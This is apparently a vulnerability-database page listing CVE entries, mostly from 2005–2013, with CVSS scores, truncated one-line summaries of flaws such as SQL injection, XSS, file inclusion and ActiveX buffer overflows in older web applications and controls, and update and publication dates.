Max CVSS 10.0 Min CVSS 2.6 Total Count334
IDCVSSSummaryLast (major) updatePublished
CVE-2006-0565 7.5
PHP remote file include vulnerability in inc/backend_settings.php in Loudblog 0.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the $GLOBALS[path] parameter.
19-02-2017 - 00:11 06-02-2006 - 18:02
CVE-2005-3390 7.5
The RFC1867 file upload feature in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5, when register_globals is enabled, allows remote attackers to modify the GLOBALS array and bypass security protections of PHP applications via a multipart/form-data POST reque
07-12-2016 - 22:00 01-11-2005 - 07:47
CVE-2006-2065 7.5
SQL injection vulnerability in save.php in PHPSurveyor 0.995 and earlier allows remote attackers to execute arbitrary SQL commands via the surveyid cookie. NOTE: this issue could be leveraged to execute arbitrary PHP code, as demonstrated by inserti
18-11-2016 - 22:00 27-04-2006 - 09:34
CVE-2006-4673 2.6
Global variable overwrite vulnerability in maincore.php in PHP-Fusion 6.01.4 and earlier uses the extract function on the superglobals, which allows remote attackers to conduct SQL injection attacks via the _SERVER[REMOTE_ADDR] parameter to news.php.
17-10-2016 - 23:40 11-09-2006 - 12:04
CVE-2005-3681 7.5
SQL injection vulnerability in viewcat.php in XOOPS WF-Downloads module 2.05 allows remote attackers to execute arbitrary SQL commands via the list parameter.
17-10-2016 - 23:36 18-11-2005 - 18:03
CVE-2005-3649 2.6
jumpto.php in Moodle 1.5.2 allows remote attackers to redirect users to other sites via the jump parameter.
17-10-2016 - 23:36 17-11-2005 - 06:02
CVE-2005-3259 7.5
Multiple SQL injection vulnerabilities in versatileBulletinBoard (vBB) 1.0.0 RC2 allow remote attackers to execute arbitrary SQL commands and bypass authentication via the (1) login field, (2) "search this thread" feature, (3) "search for posts" feat
17-10-2016 - 23:34 20-10-2005 - 06:02
CVE-2005-3236 6.8
Multiple SQL injection vulnerabilities in Cyphor 0.19 allow remote attackers to execute arbitrary SQL and obtain administrative access via (1) the fid parameter of newmsg.php, which can enable XSS attacks when the SQL syntax is invalid or (2) the nic
17-10-2016 - 23:34 14-10-2005 - 06:02
CVE-2005-3201 7.5
SQL injection vulnerability in news.php for Utopia News Pro (UNP) 1.1.3, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to execute arbitrary SQL via the newsid parameter.
17-10-2016 - 23:33 14-10-2005 - 06:02
CVE-2005-3200 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Utopia News Pro (UNP) 1.1.3 and 1.1.4 allow remote attackers to inject arbitrary web script or HTML via (1) the sitetitle parameter in header.php and (2) the version and (3) query_count parameter
17-10-2016 - 23:33 14-10-2005 - 06:02
CVE-2005-3157 7.5
SQL injection vulnerability in messages.php in PHP-Fusion 6.00.109 allows remote attackers to execute arbitrary SQL commands via the msg_send parameter, a different vulnerability than CVE-2005-3158 and CVE-2005-3159.
17-10-2016 - 23:33 06-10-2005 - 06:02
CVE-2005-3130 7.5
SQL injection vulnerability in lucidCMS 1.0.11 allows remote attackers to execute arbitrary SQL commands via the login field.
17-10-2016 - 23:32 04-10-2005 - 18:02
CVE-2005-3063 7.5
SQL injection vulnerability in MailGust 1.9 allows remote attackers to execute arbitrary SQL commands via the email field on the password reminder page.
17-10-2016 - 23:32 27-09-2005 - 15:03
CVE-2005-3048 6.4
Directory traversal vulnerability in index.php in PhpMyFaq 1.5.1 allows remote attackers to read arbitrary files or include arbitrary PHP files via a .. (dot dot) in the LANGCODE parameter, which also allows direct code injection via the User Agent f
17-10-2016 - 23:32 23-09-2005 - 20:03
CVE-2005-3045 7.5
SQL injection vulnerability in search.php in My Little Forum 1.5 and 1.6 beta allows remote attackers to execute arbitrary SQL commands via the phrase field.
17-10-2016 - 23:32 23-09-2005 - 20:03
CVE-2005-2956 5.0
ATutor 1.5.1, and possibly earlier versions, stores temporary chat logs under the web document root with insufficient access control and predictable filenames, which allows remote attackers to obtain user chat conversations via direct requests to tho
17-10-2016 - 23:31 16-09-2005 - 18:03
CVE-2005-2954 7.5
SQL injection vulnerability in password_reminder.php in ATutor before 1.5.1 pl1 allows remote attackers to execute arbitrary SQL commands via the email field.
17-10-2016 - 23:31 16-09-2005 - 18:03
CVE-2005-2951 7.5
Directory traversal vulnerability in security.inc.php in AzDGDatingLite 2.1.3, and possibly earlier versions, allows remote attackers to execute arbitrary PHP commands via ".." sequences and "%00" (trailing null byte) characters in the l parameter, w
17-10-2016 - 23:31 16-09-2005 - 18:03
CVE-2005-2892 5.0
Directory traversal vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to read arbitrary files via ".." sequences and "%00" (trailing null byte) in the u parameter.
17-10-2016 - 23:31 14-09-2005 - 16:03
CVE-2005-2792 5.0
Directory traversal vulnerability in welcome.php in phpLDAPadmin 0.9.6 and 0.9.7 allows remote attackers to read arbitrary files via a .. (dot dot) in the custom_welcome_page parameter.
17-10-2016 - 23:30 02-09-2005 - 19:03
CVE-2005-2777 7.5
Looking Glass 20040427 allows remote attackers to execute arbitrary commands via shell metacharacters in the DNS lookup query field.
17-10-2016 - 23:30 02-09-2005 - 19:03
CVE-2005-2569 4.3
Multiple cross-site scripting (XSS) vulnerabilities in FunkBoard 0.66CF, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the fbusername or fbpassword parameter to (1) editpost.php, (2) prefs.php, (3) n
17-10-2016 - 23:28 16-08-2005 - 00:00
CVE-2005-2562 7.5
SQL injection vulnerability in Gravity Board X (GBX) 1.1 allows remote attackers to execute arbitrary SQL commands and bypass authentication via the login field.
17-10-2016 - 23:28 16-08-2005 - 00:00
CVE-2005-2540 5.0
CRLF injection vulnerability in FlatNuke 2.5.5 and possibly earlier versions allows remote attackers to execute arbitrary PHP commands via an ASCII char 13 (carriage return) in the signature field, which is injected into a PHP script without a preced
17-10-2016 - 23:28 10-08-2005 - 00:00
CVE-2005-2539 4.3
Multiple cross-site scripting (XSS) vulnerabilities in FlatNuke 2.5.5 and possibly earlier versions allow remote attackers to inject arbitrary web script or HTML via the (1) bodycolor, (2) backimage, (3) theme, or (4) logo parameter to structure.php,
17-10-2016 - 23:28 10-08-2005 - 00:00
CVE-2012-0284 9.3
Stack-based buffer overflow in the SetSource method in the Cisco Linksys PlayerPT ActiveX control 1.0.0.15 in PlayerPT.ocx on the Cisco WVC200 Wireless-G PTZ Internet video camera allows remote attackers to execute arbitrary code via a long URL in th
06-09-2016 - 12:43 19-07-2012 - 11:55
CVE-2007-2430 7.8
shared/code/tce_tmx.php in TCExam 4.0.011 and earlier allows remote attackers to create arbitrary PHP files in cache/ by placing file contents and directory traversal manipulations into a SessionUserLang cookie to public/code/index.php.
26-08-2016 - 21:59 01-05-2007 - 20:19
CVE-2011-5035 5.0
Oracle Glassfish 2.1.1, 3.0.1, and 3.1.1, as used in Communications Server 2.0, Sun Java System Application Server 8.1 and 8.2, and possibly other products, computes hash values for form parameters without restricting the ability to trigger hash coll
22-08-2016 - 22:04 29-12-2011 - 20:55
CVE-2011-4885 5.0
PHP before 5.3.9 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
22-08-2016 - 22:04 29-12-2011 - 20:55
CVE-2013-4810 10.0
HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServ
29-06-2016 - 10:12 16-09-2013 - 09:01
CVE-2012-0874 6.8
The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker servlets in JBoss Enterprise Application Platform (EAP) before 5.2.0, Web Platform (EWP) before 5.2.0, BRMS Platform before 5.3.1, and SOA Platform before 5.3.1 do not require authentica
17-01-2015 - 21:59 05-02-2013 - 18:55
CVE-2012-2052 9.3
Stack-based buffer overflow in the U3D.8BI library plugin in Adobe Photoshop CS5 12.x before 12.0.5 and CS5.1 12.1.x before 12.1.1 allows remote attackers to execute arbitrary code via a long Collada asset element in a DAE file, as demonstrated by th
20-06-2014 - 14:04 19-06-2014 - 16:55
CVE-2011-4858 5.0
Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU con
05-03-2014 - 23:33 05-01-2012 - 14:55
CVE-2007-4607 9.3
Buffer overflow in the EasyMailSMTPObj ActiveX control in emsmtp.dll 6.0.1 in the Quiksoft EasyMail SMTP Object, as used in Postcast Server Pro 3.0.61 and other products, allows remote attackers to execute arbitrary code via a long argument to the Su
12-12-2013 - 22:53 30-08-2007 - 20:17
CVE-2006-0147 7.5
Dynamic code evaluation vulnerability in tests/tmssql.php test script in ADOdb for PHP before 4.70, as used in multiple products including (1) Mantis, (2) PostNuke, (3) Moodle, (4) Cacti, (5) Xaraya, (6) PhpOpenChat, possibly (7) MAXdev MD-Pro, and (
30-08-2013 - 00:52 09-01-2006 - 18:03
CVE-2006-7247 7.5
SQL injection vulnerability in the Weblinks (com_weblinks) component for Joomla! and Mambo 1.0.9 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter.
16-08-2013 - 01:46 06-09-2012 - 15:55
CVE-2010-0219 10.0
Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by u
09-05-2013 - 23:14 18-10-2010 - 13:00
CVE-2012-5897 9.3
The (1) SimpleTree and (2) ReportTree classes in the ARDoc ActiveX control (ARDoc.dll) in Quest InTrust 10.4.0.853 and earlier do not properly implement the SaveToFile method, which allows remote attackers to write or overwrite arbitrary files via th
15-01-2013 - 00:00 17-11-2012 - 16:55
CVE-2012-5896 10.0
The Annotation Objects Extension ActiveX control in AnnotateX.dll in Quest InTrust 10.4.0.853 and earlier does not properly implement the Add method, which allows remote attackers to execute arbitrary code via a memory address in the first argument,
19-11-2012 - 00:00 17-11-2012 - 16:55
CVE-2011-5034 7.8
Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted pa
06-11-2012 - 00:05 29-12-2011 - 20:55
CVE-2007-2539 7.8
The show_files function in RunCms 1.5.2 and earlier allows remote attackers to obtain sensitive information (file existence and file metadata) via unspecified vectors.
05-11-2012 - 22:38 08-05-2007 - 21:19
CVE-2007-2538 7.5
SQL injection vulnerability in class/debug/debug_show.php in RunCms 1.5.2 and earlier allows remote attackers to execute arbitrary SQL commands via the executed_queries array parameter.
05-11-2012 - 22:38 08-05-2007 - 21:19
CVE-2007-2222 9.3
Multiple buffer overflows in the (1) ActiveListen (Xlisten.dll) and (2) ActiveVoice (Xvoice.dll) speech controls, as used by Microsoft Internet Explorer 5.01, 6, and 7, allow remote attackers to execute arbitrary code via a crafted ActiveX object tha
05-11-2012 - 22:37 12-06-2007 - 15:30
CVE-2007-3294 7.5
Multiple buffer overflows in libtidy, as used in the Tidy extension for PHP 5.2.3 and possibly other products, allow context-dependent attackers to execute arbitrary code via (1) a long second argument to the tidy_parse_string function or (2) an unsp
30-10-2012 - 22:38 20-06-2007 - 17:30
CVE-2006-4602 7.5
Unrestricted file upload vulnerability in jhot.php in TikiWiki 1.9.4 Sirius and earlier allows remote attackers to execute arbitrary PHP code via a filepath parameter that contains a filename with a .php extension, which is uploaded to the img/wiki/
24-10-2012 - 00:00 06-09-2006 - 20:04
CVE-2012-5306 9.3
Stack-based buffer overflow in the SelectDirectory method in DcsCliCtrl.dll in Camera Stream Client ActiveX Control, as used in D-Link DCS-5605 PTZ IP Network Camera, allows remote attackers to cause a denial of service (crash) and possibly execute a
08-10-2012 - 00:00 06-10-2012 - 18:55
CVE-2007-2856 9.3
Buffer overflow in the Dart Communications PowerTCP ZIP Compression ActiveX control in DartZip.dll 1.8.5.3, when Internet Explorer 6 is used, allows user-assisted remote attackers to execute arbitrary code via a long first argument to the QuickZip fu
04-10-2012 - 00:00 24-05-2007 - 15:30
CVE-2011-5167 9.3
Heap-based buffer overflow in the SetDevNames method of the Tidestone Formula One ActiveX control (TTF16.ocx) 6.3.5 Build 1 in Oracle Hyperion Strategic Finance 12.x and possibly earlier allows remote attackers to execute arbitrary code via a long st
17-09-2012 - 00:00 15-09-2012 - 13:55
CVE-2012-4876 10.0
Stack-based buffer overflow in the UltraMJCam ActiveX Control in TRENDnet SecurView TV-IP121WN Wireless Internet Camera allows remote attackers to execute arbitrary code via a long string to the OpenFileDlg method.
07-09-2012 - 00:00 06-09-2012 - 17:55
CVE-2012-4598 9.3
An unspecified ActiveX control in McAfee Virtual Technician (MVT) before 6.4, and ePO-MVT, allows remote attackers to execute arbitrary code or cause a denial of service (Internet Explorer crash) via a crafted web site.
22-08-2012 - 00:00 22-08-2012 - 06:42
CVE-2012-1196 5.0
Directory traversal vulnerability in the VulCore web service (WSVulnerabilityCore/VulCore.asmx) in Lenovo ThinkManagement Console 9.0.3 allows remote attackers to delete arbitrary files via a .. (dot dot) in the filename parameter in a SetTaskLogByFi
29-02-2012 - 00:00 17-02-2012 - 19:55
CVE-2012-1195 7.5
Unrestricted file upload vulnerability in andesk/managementsuite/core/core.anonymous/ServerSetup.asmx in the ServerSetup web service in Lenovo ThinkManagement Console 9.0.3 allows remote attackers to execute arbitrary code by uploading a file with an
29-02-2012 - 00:00 17-02-2012 - 19:55
CVE-2012-1065 4.3
Insecure method vulnerability in TuxScripting.dll in the TuxSystem ActiveX control in 2X ApplicationServer 10.1 Build 1224 allows remote attackers to create or overwrite arbitrary files via the ExportSettings method.
15-02-2012 - 10:17 14-02-2012 - 12:55
CVE-2011-4084
** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2011-4858. Reason: This candidate is a duplicate of CVE-2011-4858. Notes: All CVE users should reference CVE-2011-4858 instead of this candidate. All references and descriptions in t
06-01-2012 - 23:17 29-12-2011 - 20:55
CVE-2006-7070 7.5
Unrestricted file upload vulnerability in manager/media/ibrowser/scripts/rfiles.php in Etomite CMS 0.6.1 and earlier allows remote attackers to upload and execute arbitrary files via an nfile[] parameter with a filename that contains a .php extension
08-12-2011 - 00:00 02-03-2007 - 16:18
CVE-2006-3904 6.8
SQL injection vulnerability in manager/index.php in Etomite CMS 0.6.1 and earlier, with magic_quotes_gpc disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter.
08-12-2011 - 00:00 27-07-2006 - 18:04
CVE-2006-0658 5.0
Incomplete blacklist vulnerability in connector.php in FCKeditor 2.0 and 2.2, as used in products such as RunCMS, allows remote attackers to upload and execute arbitrary script files by giving the files specific extensions that are not listed in the
12-10-2011 - 00:00 13-02-2006 - 06:06
CVE-2010-4701 7.6
Heap-based buffer overflow in the CDrawPoly::Serialize function in fxscover.exe in Microsoft Windows Fax Services Cover Page Editor 5.2 r2 in Windows XP Professional SP3, Server 2003 R2 Enterprise Edition SP2, and Windows 7 Professional allows remote
04-10-2011 - 22:50 20-01-2011 - 14:00
CVE-2006-2516 5.1
mainfile.php in XOOPS 2.0.13.2 and earlier, when register_globals is enabled, allows remote attackers to overwrite variables such as $xoopsOption['nocommon'] and conduct directory traversal attacks or include PHP files via (1) xoopsConfig[language] t
03-10-2011 - 00:00 22-05-2006 - 18:02
CVE-2006-3571 2.6
Multiple cross-site scripting (XSS) vulnerabilities in interna/hilfe.php in Papoo 3 RC3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) titel or (2) ausgabe parameters.
13-09-2011 - 00:00 12-07-2006 - 21:05
CVE-2006-0659 6.8
Multiple PHP remote file include vulnerabilities in RunCMS 1.2 and earlier, with register_globals and allow_url_fopen enabled, allow remote attackers to execute arbitrary code via the bbPath[path] parameter in (1) class.forumposts.php and (2) forumpo
08-09-2011 - 00:00 13-02-2006 - 06:06
CVE-2006-4042 7.5
Multiple SQL injection vulnerabilities in trackback.php in myWebland myBloggie 2.1.4 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) title, (2) url, (3) excerpt, or (4) blog_name parameters.
06-09-2011 - 00:00 09-08-2006 - 19:04
CVE-2006-1031 7.5
config/config_inc.php in iGENUS Webmail 2.02 and earlier allows remote attackers to include arbitrary local files via the SG_HOME parameter.
23-08-2011 - 00:00 07-03-2006 - 06:02
CVE-2006-3775 7.5
SQL injection vulnerability in the init function in class_session.php in MyBB (aka MyBulletinBoard) 1.1.5 allows remote attackers to execute arbitrary SQL commands via the CLIENT-IP HTTP header ($_SERVER['HTTP_CLIENT_IP'] variable), as utilized by in
08-08-2011 - 00:00 24-07-2006 - 08:19
CVE-2005-3996 5.1
SQL injection vulnerability in admin/password_forgotten.php in Zen Cart 1.2.6d and earlier allows remote attackers to execute arbitrary SQL commands via the admin_email parameter.
08-08-2011 - 00:00 04-12-2005 - 19:03
CVE-2005-3686 7.5
SQL injection vulnerability in search.inc.php in Unclassified NewsBoard before 1.5.3 Patch 4 allows remote attackers to execute arbitrary SQL commands via the (1) DateFrom or (2) DateUntil parameter to forum.php.
05-08-2011 - 00:00 18-11-2005 - 20:03
CVE-2006-0146 7.5
The server.php test script in ADOdb for PHP before 4.70, as used in multiple products including (1) Mantis, (2) PostNuke, (3) Moodle, (4) Cacti, (5) Xaraya, (6) PHPOpenChat, (7) MAXdev MD-Pro, and (8) MediaBeez, when the MySQL root password is empty,
14-06-2011 - 00:00 09-01-2006 - 18:03
CVE-2008-4771 9.3
Stack-based buffer overflow in VATDecoder.VatCtrl.1 ActiveX control in (1) 4xem VatCtrl Class (VATDecoder.dll 1.0.0.27 and 1.0.0.51), (2) D-Link MPEG4 SHM Audio Control (VAPGDecoder.dll 1.7.0.5), (3) Vivotek RTSP MPEG4 SP Control (RtspVapgDecoderNew.
07-03-2011 - 22:13 28-10-2008 - 15:20
CVE-2008-4346 7.5
Directory traversal vulnerability in TalkBack 2.3.6 and 2.3.6.4 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter to comments.php, a different vector than CVE-2008-3371.
07-03-2011 - 22:12 30-09-2008 - 14:15
CVE-2008-0399 6.8
Multiple buffer overflows in Toshiba Surveillance (Surveillix) RecordSend ActiveX control (MeIpCamX.DLL 1.0.0.4) allow remote attackers to execute arbitrary code via long arguments to the (1) SetPort and (2) SetIpAddress methods.
07-03-2011 - 22:04 23-01-2008 - 07:00
CVE-2008-0380 10.0
Buffer overflow in the Digital Data Communications RtspVaPgCtrl ActiveX control (RtspVapgDecoder.dll 1.1.0.29) allows remote attackers to execute arbitrary code via a long MP4Prefix property.
07-03-2011 - 22:04 22-01-2008 - 15:00
CVE-2007-6493 10.0
The IMWeb.IMWebControl.1 ActiveX control in IMWeb.dll 7.0.0.x, and possibly IMWebControl.dll, in iMesh 7.1.0.x and earlier allows remote attackers to execute arbitrary code via a certain argument to the SetHandler method.
07-03-2011 - 22:02 20-12-2007 - 15:46
CVE-2007-6457 5.0
Stack-based buffer overflow in the webmail feature in SurgeMail 38k4 allows remote attackers to cause a denial of service (crash) via a long Host header.
07-03-2011 - 22:02 19-12-2007 - 19:46
CVE-2007-6453 10.0
Directory traversal vulnerability in raidenhttpd-admin/workspace.php in RaidenHTTPD 2.0.19, when the WebAdmin function is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the ulang parameter.
07-03-2011 - 22:02 19-12-2007 - 19:46
CVE-2007-5779 7.5
Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player (GOM Player) 2.1.6.3499 allows remote attackers to execute arbitrary code via a long argument to the OpenUrl method.
07-03-2011 - 22:01 01-11-2007 - 12:46
CVE-2007-5219 6.4
Directory traversal vulnerability in the CLAVSetting.CLSetting.1 ActiveX control in CLAVSetting.DLL 1.00.1829 in the CLAVSetting module in CyberLink PowerDVD 7.0 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in the
07-03-2011 - 22:00 04-10-2007 - 20:17
CVE-2007-4646 10.0
Buffer overflow in the pop3 service in Hexamail Server 3.0.0.001 Lite allows remote attackers to cause a denial of service (daemon crash) and probably execute arbitrary code via a long USER command.
07-03-2011 - 21:58 31-08-2007 - 19:17
CVE-2007-4489 6.8
Buffer overflow in the IUAComFormX ActiveX control in uacomx.ocx 2.0.1 in the eCentrex VOIP Client module allows remote attackers to execute arbitrary code via a long Username argument to the ReInit method.
07-03-2011 - 21:58 22-08-2007 - 19:17
CVE-2007-3536 7.6
Multiple buffer overflows in the AMX NetLinx VNC (AmxVnc) ActiveX control in AmxVnc.dll 1.0.13.0 allow remote attackers to execute arbitrary code via long (1) Host, (2) Password, or (3) LogFile property values.
07-03-2011 - 21:56 03-07-2007 - 16:30
CVE-2007-3111 10.0
Buffer overflow in the Provideo Camimage ActiveX control in ISSCamControl.dll 1.0.1.5, when Internet Explorer 6 is used on Windows 2000 SP4, allows remote attackers to execute arbitrary code via a long URL property value.
07-03-2011 - 21:55 07-06-2007 - 17:30
CVE-2007-2938 10.0
Buffer overflow in the BaseRunner ActiveX control in the Ademco ATNBaseLoader100 Module (ATNBaseLoader100.dll) 5.4.0.6, when Internet Explorer 6 is used, allows remote attackers to execute arbitrary code via a long argument to the (1) Send485CMD meth
07-03-2011 - 21:55 30-05-2007 - 20:30
CVE-2007-2814 7.5
Multiple stack-based buffer overflows in the Pegasus ImagN' ActiveX control (IMW32O40.OCX) 4.00.041 allow remote attackers to execute arbitrary code via (1) a long FileName parameter, or unspecified vectors involving the (2) BeginReport, (3) CreatePi
07-03-2011 - 21:55 22-05-2007 - 15:30
CVE-2007-0812 7.5
SQL injection vulnerability in pms.php in Woltlab Burning Board (wBB) Lite 1.0.2pl3e and earlier allows remote authenticated users to execute arbitrary SQL commands via the pmid[0] parameter.
07-03-2011 - 21:50 07-02-2007 - 06:28
CVE-2007-0639 7.5
Multiple static code injection vulnerabilities in error.php in GuppY 4.5.16 and earlier allow remote attackers to inject arbitrary PHP code into a .inc file in the data/ directory via (1) a REMOTE_ADDR cookie or (2) a cookie specifying an element of
07-03-2011 - 21:50 31-01-2007 - 16:28
CVE-2007-0340 7.5
SQL injection vulnerability in inc/header.inc.php in ThWboard 3.0b2.84-php5 and earlier allows remote attackers to execute arbitrary SQL commands via the board[styleid] parameter to index.php.
07-03-2011 - 21:49 17-01-2007 - 21:28
CVE-2007-0261 10.0
snews.php in sNews 1.5.30 and earlier does not properly exit when authentication fails, which allows remote attackers to perform unauthorized administrative actions, as demonstrated by changing an administrative password via the changeup task, and by
07-03-2011 - 21:49 16-01-2007 - 18:28
CVE-2007-0233 7.5
wp-trackback.php in WordPress 2.0.6 and earlier does not properly unset variables when the input data includes a numeric parameter with a value matching an alphanumeric parameter's hash value, which allows remote attackers to execute arbitrary SQL co
07-03-2011 - 21:49 12-01-2007 - 21:28
CVE-2006-7173 10.0
Direct static code injection vulnerability in admin.php in PHP-Stats 0.1.9.1b and earlier allows remote attackers to execute arbitrary PHP code via a crafted option_new[report_w_day] parameter in a preferenze action, which can be later accessed via o
07-03-2011 - 21:48 20-03-2007 - 18:19
CVE-2006-7172 7.5
Multiple SQL injection vulnerabilities in php-stats.recphp.php in PHP-Stats 0.1.9.1b and earlier allow remote attackers to execute arbitrary code via a leading dotted-quad IP address string in the (1) PC-REMOTE-ADDR HTTP header, which is inserted int
07-03-2011 - 21:48 20-03-2007 - 18:19
CVE-2006-7101 7.5
SQL injection vulnerability in admin.php in PHPWind 5.0.1 and earlier allows remote attackers to execute arbitrary SQL commands via the AdminUser cookie.
07-03-2011 - 21:47 03-03-2007 - 16:19
CVE-2006-6880 7.5
Multiple SQL injection vulnerabilities in code/guestadd.php in PHP-Update 2.7 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) newmessage, (2) newname, (3) newwebsite, or (4) newemail parameter.
07-03-2011 - 21:47 31-12-2006 - 00:00
CVE-2006-6879 6.0
Unrestricted file upload vulnerability in admin/uploads.php in PHP-Update 2.7 and earlier allows remote authenticated users to upload arbitrary PHP scripts to the gfx/ and files/ directories via the userfile parameter.
07-03-2011 - 21:47 31-12-2006 - 00:00
CVE-2006-6853 10.0
Buffer overflow in Durian Web Application Server 3.02 freeware on Windows allows remote attackers to execute arbitrary code via a long string in a crafted packet to TCP port 4002.
07-03-2011 - 21:47 31-12-2006 - 00:00
CVE-2006-6661 7.5
Variable overwrite vulnerability in blog.php in PHP-Update 2.7 and earlier allows remote attackers to overwrite arbitrary program variables and execute arbitrary PHP code via multiple vectors that use the extract function, as demonstrated by the (1)
07-03-2011 - 21:46 20-12-2006 - 18:28
CVE-2006-6624 4.0
The FTP Server in Sambar Server 6.4 allows remote authenticated users to cause a denial of service (application crash) via a long series of "./" sequences in the SIZE command.
07-03-2011 - 21:46 18-12-2006 - 06:28
CVE-2006-6237 7.5
SQL injection vulnerability in the decode_cookie function in thread.php in Woltlab Burning Board Lite 1.0.2 allows remote attackers to execute arbitrary SQL commands via the threadvisit Cookie parameter.
07-03-2011 - 21:45 03-12-2006 - 14:28
CVE-2006-5561 7.5
SQL injection vulnerability in admincp.php in Discuz! GBK 5.0.0 allows remote attackers to execute arbitrary SQL commands via the cdb_auth cookie.
07-03-2011 - 21:43 27-10-2006 - 12:07
CVE-2006-5030 7.5
SQL injection vulnerability in modules/messages/index.php in exV2 2.0.4.3 and earlier allows remote authenticated users to execute arbitrary SQL commands via the sort parameter.
07-03-2011 - 21:42 27-09-2006 - 19:07
CVE-2006-4963 6.4
Directory traversal vulnerability in index.php in Exponent CMS 0.96.3 allows remote attackers to read and execute arbitrary local files via a .. (dot dot) sequence in the view parameter in the show_view action in the calendarmodule module, as demonst
07-03-2011 - 21:42 23-09-2006 - 06:07
CVE-2006-4859 7.5
Unrestricted file upload vulnerability in contact.html.php in the Contact (com_contact) component in Limbo (aka Lite Mambo) CMS 1.0.4.2L and earlier allows remote attackers to upload PHP code to the images/contact folder via a filename with a double
07-03-2011 - 21:42 19-09-2006 - 14:07
CVE-2006-4723 5.1
PHP remote file inclusion vulnerability in raidenhttpd-admin/slice/check.php in RaidenHTTPD 1.1.49, when register_globals and WebAdmin is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the SoftParserFileXml parameter.
07-03-2011 - 21:41 12-09-2006 - 12:07
CVE-2006-4558 7.5
DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
07-03-2011 - 21:41 05-09-2006 - 20:04
CVE-2006-4267 7.5
Multiple SQL injection vulnerabilities in CubeCart 3.0.11 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) oid parameter in modules/gateway/Protx/confirmed.php and the (2) x_invoice_num parameter in modules/gateway/Aut
07-03-2011 - 21:40 21-08-2006 - 17:04
CVE-2006-4191 5.1
Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by in
07-03-2011 - 21:40 16-08-2006 - 21:04
CVE-2006-3996 6.5
SQL injection vulnerability in links/index.php in ATutor 1.5.3.1 and earlier allows remote authenticated users to execute arbitrary SQL commands via the (1) desc or (2) asc parameters.
07-03-2011 - 21:40 04-08-2006 - 20:04
CVE-2006-3994 7.5
SQL injection vulnerability in the u2u_send_recp function in u2u.inc.php in XMB (aka extreme message board) 1.9.6 Alpha and earlier allows remote attackers to execute arbitrary SQL commands via the u2uid parameter to u2u.php, which is directly access
07-03-2011 - 21:39 04-08-2006 - 20:04
CVE-2006-3851 7.5
SQL injection vulnerability in upgradev1.php in X7 Chat 2.0.4 and earlier allows remote attackers to execute arbitrary SQL commands via the old_prefix parameter.
07-03-2011 - 21:39 25-07-2006 - 19:04
CVE-2006-3832 7.5
SQL injection vulnerability in index.php in Gerrit van Aaken Loudblog 0.5 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
07-03-2011 - 21:39 25-07-2006 - 09:22
CVE-2006-3611 5.5
Directory traversal vulnerability in pm.php in Phorum 5 allows remote authenticated users to include and execute arbitrary local files via directory traversal sequences in the GLOBALS[template] parameter, as demonstrated by injecting PHP sequences in
07-03-2011 - 21:39 18-07-2006 - 11:46
CVE-2006-3572 7.5
SQL injection vulnerability in forumthread.php in Papoo 3 RC3 and earlier allows remote attackers to execute arbitrary SQL commands via the msgid parameter.
07-03-2011 - 21:38 12-07-2006 - 21:05
CVE-2006-3533 5.8
Multiple cross-site scripting (XSS) vulnerabilities in Pivot 1.30 RC2 and earlier, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) fg, (2) line1, (3) line2, (4) bg, (5) c1, (6) c2, (7) c3, a
07-03-2011 - 21:38 12-07-2006 - 17:05
CVE-2006-3531 7.5
includes/editor/insert_image.php in Pivot 1.30 RC2 and earlier creates the authentication credentials from parameters, which allows remote attackers to obtain privileges and upload arbitrary files via modified (1) pass and (2) session parameters, and
07-03-2011 - 21:38 12-07-2006 - 17:05
CVE-2006-3364 7.5
SQL injection vulnerability in index.php in the NP_SEO plugin in BLOG:CMS before 4.1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
07-03-2011 - 21:38 06-07-2006 - 16:05
CVE-2006-3362 5.1
Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when
07-03-2011 - 21:38 06-07-2006 - 16:05
CVE-2006-3292 7.5
